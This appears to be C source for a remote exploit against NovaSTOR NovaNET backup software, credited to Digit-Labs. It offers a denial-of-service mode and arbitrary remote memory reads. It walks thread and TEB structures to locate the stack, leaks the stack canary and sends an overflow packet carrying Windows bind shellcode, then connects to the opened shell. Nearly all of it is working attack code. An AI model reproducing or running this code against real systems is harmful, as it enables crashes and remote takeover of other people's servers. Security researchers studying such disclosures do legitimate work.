int
main (int argc, char **argv)
{
void *start, *end;
printf ("NovaSTOR NovaNET remote DoS + arbitrary memory read\n"
"by: <*****@*****.**>\n"
"http://www.digit-labs.org/ -- Digit-Labs 2007!@$!\n\n");
if ((argc % 2) == 1 ||
(argc > 3 && (sscanf (argv[2], "0x%p", &start) != 1 ||
sscanf (argv[3], "0x%p", &end) != 1)))
{
fprintf (stderr, "Usage: %s <host> [[start] [end]]\n"
"Note: not specifying [[start] [end]] results in DoS!\n\n", argv[0]);
exit (EXIT_SUCCESS);
}
if (argc > 3)
printf ("dumping from: %p -> %p (%d-bytes) to stderr\n", start, end, (int) (end - start));
novanet_read (argv[1], start, end, !(argc > 3));
return (EXIT_SUCCESS);
}
static void
novanet_read_str (char *host, void *start, char *dst, int dst_len)
{
char r_val[NOVANET_READ_SZ], *ptr;
void *r_addr;
int nbytes;
nbytes = 0;
ptr = dst;
r_addr = start;
do
{
if (novanet_read (host, r_addr, &r_val) == 0)
break;
strncpy (ptr, r_val, 4);
if (HAS_NULL (*(int *) r_val))
break;
ptr += 4;
r_addr += 4;
nbytes += 4;
}
while (nbytes < dst_len - 5);
}
static void
novanet_own_process (char *thost, char *d_name, int esp_val)
{
char rbuf_pkt[NOVANET_PKT_SZ], *ptr;
int canary_val, fd, n, rlen;
if (novanet_read (thost, (void *) 0x016A6784, &canary_val) == 0)
{
fprintf (stderr, "novanet_own_process: reading canary failed\n");
exit (EXIT_FAILURE);
}
fd = sockami (thost, NOVANET_TCP_PORT);
if (fd == -1)
{
fprintf (stderr, "novanet_own_process: sockami failed\n");
exit (EXIT_FAILURE);
}
printf ("** [nnwindtb.dll @ 0x016A6784] stack canary: 0x%08X\n\n", (int) canary_val);
if (HAS_NULL (CANARY_VAL(canary_val, esp_val)))
{
fprintf (stderr, "novanet_own_process: canary value invalid :(\n");
exit (EXIT_FAILURE);
}
printf ("* connected to %s:%d\n", thost, NOVANET_TCP_PORT);
memcpy (&login_buf[0x54], d_name, NOVANET_DOMAIN_SZ);
printf ("** sending login packet...");
if ((n = sock_send (fd, login_buf, sizeof login_buf - 1)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** reading fourth packet...");
if ((n = sock_recv (fd, rbuf_pkt, sizeof rbuf_pkt)) != NOVANET_PKT_SZ)
{
fprintf (stderr, "novanet_own_process: sock_recv returned %d (!= %d)\n",
n, NOVANET_PKT_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
rlen = 0x10C + 64 + (sizeof win32_x86_bind - 1) + 1;
*(unsigned int *) &rem_buf[12] = rlen + NOVANET_HDR_SZ;
printf ("** sending remaining %d-bytes packet...", rlen);
if ((n = sock_send (fd, rem_buf, sizeof rem_buf - 1)) != NOVANET_HDR_SZ)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, NOVANET_HDR_SZ);
exit (EXIT_FAILURE);
}
printf ("done\n");
printf ("** sending hammer packet...");
ptr = malloc (rlen * sizeof (char));
memset (ptr, 0x41, rlen);
*(unsigned int *) &ptr[0x104] = CANARY_VAL(canary_val, esp_val);
*(unsigned int *) &ptr[0x108] = NTDLL_ESP;
memcpy (&ptr[0x10C + 64], win32_x86_bind, sizeof win32_x86_bind - 1);
ptr[rlen - 1] = '\0';
if ((n = sock_send (fd, ptr, rlen)) != rlen)
{
fprintf (stderr, "novanet_own_process: sock_send returned %d (!= %d)\n",
n, rlen);
exit (EXIT_FAILURE);
}
free (ptr);
printf ("done\n\n");
usleep (USLEEP_TIME);
close (fd);
printf ("* waiting for the shellcode to be executed...\n");
sleep (2);
if ((fd = sockami (thost, PORT_SHELL)) != -1)
{
printf ("+Wh00t!\n\n");
shellami (fd);
}
}
static int
novanet_map_process (char *host, int *esp_val)
{
void *r_addr, *teb_addr, *thr_list, *arg_addr;
int i, j, num_threads, thr_count;
char r_buf[NOVANET_BUF_SZ];
r_addr = (void *) 0x10133C60 + 0x12510;
if (novanet_read (host, r_addr, &thr_count) == 0)
return (-1);
printf ("** [nnwinsup.dll @ 0x10133C60+0x12510] thread list used: 0x%08X\n",
thr_count);
num_threads = 0;
r_addr = (void *) 0x10133C60 + 0xB938;
if (novanet_read (host, r_addr, &thr_list) == 0)
return (-1);
printf ("*** [nnwinsup.dll @ 0x10133C60+0x0B938] head ptr: 0x%08X\n", (int) thr_list);
arg_addr = NULL;
while ((r_addr = thr_list))
{
if (novanet_read (host, r_addr, &thr_list) == 0)
return (-1);
novanet_read_str (host, r_addr + 0xE8, r_buf, sizeof r_buf);
printf ("*** [nnwinsup.dll @ 0x%08X] next ptr: 0x%08X, name: \"%s\"\n",
(int) r_addr, (int) thr_list, r_buf);
if (strcmp (r_buf, NOVANET_THREAD_NAME) == 0)
arg_addr = r_addr;
if (thr_list != NULL)
num_threads++;
}
printf ("** [nnwinsup.dll @ 0x10133C60+0x0B938] thread count: %d\n", num_threads);
if (arg_addr == NULL)
return (-1);
for (i = 0; i < NOVANET_TEB_BLKS; i++)
{
teb_addr = teb_addrs[i].teb_start - WIN32_TEB_SZ;
printf ("** [TEB BLK @ 0x%08X] scanning %d blocks\n", (int) teb_addr, teb_addrs[i].teb_num);
for (j = 0; j < teb_addrs[i].teb_num; j++, teb_addr -= WIN32_TEB_SZ)
{
int st_addr, sb_addr, thr_id;
void *thr_arg;
r_addr = teb_addr + 0x04;
if (novanet_read (host, r_addr, &st_addr) == 0)
break;
r_addr = teb_addr + 0x08;
if (novanet_read (host, r_addr, &sb_addr) == 0)
break;
r_addr = teb_addr + 0x24;
if (novanet_read (host, r_addr, &thr_id) == 0)
break;
if (st_addr != 0xFFFFFFFF)
{
r_addr = (void *) st_addr - 0x7C;
if (novanet_read (host, r_addr, &thr_arg) == 0)
break;
}
else
thr_arg = (void *) 0xDEADBEEF;
printf ("** [TEB @ 0x%08X] thread id: %04X, stack base: 0x%08X, top: 0x%08X, arg: 0x%08X\n",
(int) teb_addr, thr_id, sb_addr, st_addr, (int) thr_arg);
if (thr_arg == arg_addr)
{
printf ("** [TEB @ 0x%08X] found thread id: %04X, stack top: 0x%08X, ESP: 0x%08X\n",
(int) teb_addr, thr_id, st_addr, st_addr - 0x444);
*esp_val = st_addr - 0x444;
return (0);
}
}
}
return (-1);
}
